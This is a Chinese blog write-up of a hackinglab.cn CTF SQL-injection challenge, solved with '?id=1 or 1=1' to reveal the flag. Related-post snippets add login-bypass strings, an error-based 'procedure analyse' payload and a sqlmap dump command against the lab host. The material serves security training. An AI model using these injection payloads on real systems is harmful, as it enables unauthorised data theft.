hackinglab.cn 注入关之二

最新推荐文章于 2020-11-28 08:37:31 发布
最新推荐文章于 2020-11-28 08:37:31 发布
阅读量1.6k 收藏
点赞数
分类专栏: hackinglab.cn-题解
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kostart123/article/details/53671515
版权

题目:

最简单的SQL注入。


writeup:

点击题目地址可以看到一句没什么用的话。

  1. 一般提示应该在源代码中,果然: 
    <!-- tips: id=1
  2. 在url后加?id=1连接后看结果,发现还是刚才那句话。改变id的数值试试,发现会有空白页的情况,在换成字符串试试(不要加引号)会有一个警告: 
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli3_6590b07a0a39c8c27932b92b0e151456/index.php on line 37

    所以查询时用的是数字型的。
  3. 构造常规注入语句: 
    ?id=1 or 1=1

    结果如下: 
    文章管理系统
文章管理系统测试
这个题目很简单
小红说:简单的不能再简单了!
但flag在哪里呢?
flag就在这个表里!
flagishere#
HKGGflagdfs56757fsdv

    Get Flag!!
r00tnb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【writeup】网安实验室hackinglab 注入
Oliver99877的博客
10-12 458
【题目1】 最简单的SQL注入 分值: 100 最简单的SQL注入 【思路】 本题未做任何防护,可以考虑在用户名处:1' or 1=1 -- 通过闭合单引号,然后注释掉后面原有的单引号来注入 密码随便填写即可 【题目2】 最简单的SQL注入(熟悉注入环境) 分值: 100 最简单的SQL注入 【思路】 1.index.php?id=1'...
Hackinglab注入
weixin_30721899的博客
11-27 1411
基本做过忘记做记录。没事做做注入,做一下笔记。 1.最简单的SQL注入   Tips题目里有简单提示.页面如下图。 说了有提示,就看看源码。 payload :admin ' or 1=1# 2.最简单的SQL注入(熟悉注入环境) pyload: http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92...
HackingLab 注入
Galaxy_fan的博客
07-13 1425
$strsql="select * from `user` where userid=".intval($_GET['userid'])." and password='".md5($_GET['pwd'], true) ."'";
hackinglab.cn 注入之四
r00tnb的博客
12-15 1674
题目: 小明经过学习,终于对SQL注入有了理解,她知道原来sql注入的发生根本原因还是数据和语句不能正确分离的原因,导致数据作为sql语句执行;但是是不是只要能够控制sql语句的一部分就能够来利用获取数据呢?小明经过思考知道,where条件可控的情况下,实在是太容易了,但是如果是在limit条件呢?   writeup: 写在前面:地址由于太长题目地址就用url代替。 点击题目进去, ...
hackinglab.cn注入之三
r00tnb的博客
12-15 1875
题目: 小明终于知道,原来黑客如此的吊,还有sql注入这种高端技术,因此他开始学习防注入!(flag是随机序列) writeup: 点击题目地址进去,发现一段话。 查看源代码,发现提示: &lt;!-- tips: id=1 构造id参数的查询语句,各种试id的值,发现结果只有一句话和空白页两种情况。然后添加单引号发现返回空白页。 由于加单引号会出现空白页,没有报错,尝试宽字...
hackinglab注入WP(二)
Yale的博客
04-07 1561
HACKLAB注入(http://www.tuicool.com/articles/nMrqeay) 4.到底能不能回显 构造这个语句 ?start=0 procedure analyse(extractvalue(rand(),concat(1, 得到结果 XPATH syntax error: 'article,user'   知道现在的数据库中有两个表:article和user
alpine-apache2-reverse-proxy-forensicid-uniqueid:具有取证准备和示例后端服务的Alpine Linux Apache2反向代理
05-25
具有取证ID和Unuique ID的Alpine Apache2反向代理和后端服务 介绍 这是带有示例php的Hacking-Lab CTF系统后端服务的模板高山apache2反向代理 根据 hackinglab / alpine-base:latest 规格 使用s6启动处理 动态创建...
hackinglab注入WP
Yale的博客
04-06 802
1.简单的SQL注入 源码有提示: 用admin登录,明摆着告诉我们用万能密码啊username:admin' or 1=1# password:任意一定要填对验证码 就得到key了2.最简单的SQL注入(熟悉注入环境) 又有提示 开始构造php?id=1 1' 1 or 1得到key3.防注入 需要用到limit,or,宽字符 ?id=1' or 1=1
网络安全攻防实验室通教程-注入
热门推荐
黑面狐
10-19 1万+
网络安全实验室传送门: 地址:http://hackinglab.cn  第一题:最简单的SQL注入 查看网页源码,获取到提示,要登录admin 所以构造用户名  admin' or 'a'='a'#   密码随便填, 获取到flag 第2题:最简单的sql注入(熟悉环境) 查看网页源码获得提示参数id=1  是数字型注入 于是构造url    index.
C++中函数调用时的三种参数传递方式详解
qq_23923713的博客
11-28 359
原文地址:https://blog.csdn.net/ccblogger/article/details/77752659?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.control&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.co
hackinglab.cn 注入之一
r00tnb的博客
12-15 3780
题目: Tips题目里有简单提示. writeup: 第一应该挺简单的。 点击题目地址进去,显示的是一个简单的登陆界面,还有一个验证码。 查看一下源代码,发现有一个提示: &lt;!-- Tips login as admin--&gt; 也就是说登录名已经告诉你了。 开始填写表单,登录名就写admin,密码随便填,验证码输入正确,等待返回结果是登录失败!预料之中,在登录名...
网络信息安全学习平台---注入第7题
幽狼传说
06-21 3024
网络信息安全学习平台网址:http://hackinglab.cn/ sql盲注:题目内容见平台上的第7题 我主要使用的基于时间的盲注,其它类型的盲注可自行测试 1、首先要确定数据库名的长度 输入 http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin'  and
hackinglab-注入-第1题
u012851380的博客
11-20 867
输入用户名、密码为admin’ or ‘1’='1 flag出现
CTF-网络信息安全攻防学习平台(注入)
凝聚力安全团队
07-07 2808
注入第一第二第三 题库地址:http://hackinglab.cn 第一 题目:         最简单的SQL注入         分值: 100         Tips题目里有简单提示 Writeup: 像看到SQL注入题,还是登陆框,就可以先试试
HackingLab 注入第7题
11-19 175
HackingLab 注入第7题通过时间注入,获得了一些信息,但在填入FLAG值时都不正确,以下为结果,供大家参考 sqlmap -u "http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin" --dump -C "motto" -T "motto" -D "mydbs" 通过sqlmap获得了,数据库为mydbs,表有3个 log()、motto(id,motto,usirnam
注入
weixin_43245269的博客
06-29 662
注入1 最简单的SQL注入 分值: 100 Tips题目里有简单提示 用户名:admin or '1=1' 密码:随意 成功! 注入2 最简单的SQL注入(熟悉注入环境) 分值: 100 最简单的SQL注入 http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 or ‘1=1’ 获得flag。 -- 数字型注入点select * from 表名 where id=1 http://xxx
简单的sql注入之一 (实验吧)
wewww111的博客
08-11 3794
1.判断注入类型 1' or '1' = '1 结果如下 测试几个简单的语句后, 1' order by 1 # , 1' select 1 # 根据报错信息 #  -- - order by select 等键词都被过滤 键词被过滤:解决方法如下 1大小写交替: Order SeLect  2.双写  : OderOrder SelectSelect  3.交叉: sele...
mysql limit后的注入
ztaos的博客
12-04 627
mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1); 例子:http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1    procedure
对字符编码的学习理解
微风轻拂
01-24 779
我以前从事计算机底层工作,比较少涉及到各种中文英文字符集及其转换。最近学习Java+Mysql时碰到了这个字符设置问题,思考一阵后我从比较熟悉的底层的角度来理解这个问题。 字符指人类或智能模块能理解的语句或数据的组成元素,例如字符串“Hello world”里面的各个字符。计算机底层以及网络传输层并不懂字符,只懂得01010101这样的二进制编码,故字符必须转换为二进制编码后才能通过计算机底
http://hackinglab.cn/index.php
最新发布
03-16
您好,http://hackinglab.cn/index.php 是一个网络安全实验室的网站,提供了各种网络安全实验和挑战,旨在帮助人们学习和提高网络安全技能。该网站还提供了一些网络安全工具和资源,供用户下载和使用。如果您对网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值